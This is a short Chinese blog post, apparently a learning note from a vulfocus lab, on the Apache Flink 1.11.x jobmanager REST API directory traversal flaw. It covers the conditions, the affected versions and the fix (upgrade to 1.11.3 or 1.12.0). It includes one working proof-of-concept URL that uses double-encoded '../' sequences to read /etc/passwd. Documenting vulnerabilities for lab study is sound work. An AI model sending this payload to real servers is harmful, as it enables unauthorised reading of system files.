热门标签
热门文章
- 1在GAZEBO中使用URDF模型_gazebo导入urdf
- 2AI大发展:人机交互、智能生活全解析
- 3走近智算 | 开源大模型Llama 3.1技术分析_llama 3.1 数学
- 4队列部分学习总结(队列的顺序存储实现,链式存储实现)_学习链式存储的心得
- 5融云亮相 2024 ChinaJoy,什么才是游戏迷真正的快乐源泉?
- 6hive优化
- 7大模型参加高考,同写2024年高考作文,及格分(通义千问、Kimi、智谱清言、Gemini Advanced、Claude-3-Sonnet、GPT-4o)_只谱 和kimi 谁水平高
- 8性能测试之Mysql数据库调优_mysql性能监控和调优实际案例
- 9透彻理解Java并发编程_透彻理解java并发编程系列
- 10Python递归爬取今日头条指定用户一个月内发表的所有文章,视频,微头条(1)_爬取今日头条用户文章列表
当前位置: article > 正文
Apache Flink jobmanager 目录遍历漏洞_vulfocus靶场如何做flink目录遍历
作者:你好赵伟 | 2024-08-11 19:17:51
赞
踩
vulfocus靶场如何做flink目录遍历
漏洞描述:
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞 远程攻击者通过REST API目录遍历,可造成文件读取/写入的影响。
漏洞利用条件:
REST API目录没有认可认证的情况下暴露配置信息
漏洞影响范围:
Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2
漏洞复现:
1.验证poc:/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
修复建议:
将Flink版本升级至1.11.3或1.12.0版本。
学习记录,仅供参考!!!
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/965685
推荐阅读
相关标签
